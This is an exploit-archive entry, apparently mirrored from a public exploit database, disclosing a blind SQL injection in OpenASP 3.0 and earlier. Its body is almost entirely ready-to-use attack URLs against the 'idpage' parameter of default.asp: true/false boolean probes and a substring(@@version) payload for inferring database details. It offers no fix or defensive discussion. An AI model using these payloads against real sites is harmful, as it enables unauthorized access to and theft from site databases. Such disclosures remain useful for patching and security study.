[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenASP <= 3.0 Blind SQL Injection Vulnerability
# Published : 2008-11-17
# Author : StAkeR
# Previous Title : mxCamArchive 2.2 Bypass Config Download Vulnerability
# Next Title : FREEze Greetings 1.0 Remote Password Retrieve Exploit
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# www.Syue.com [2008-11-17]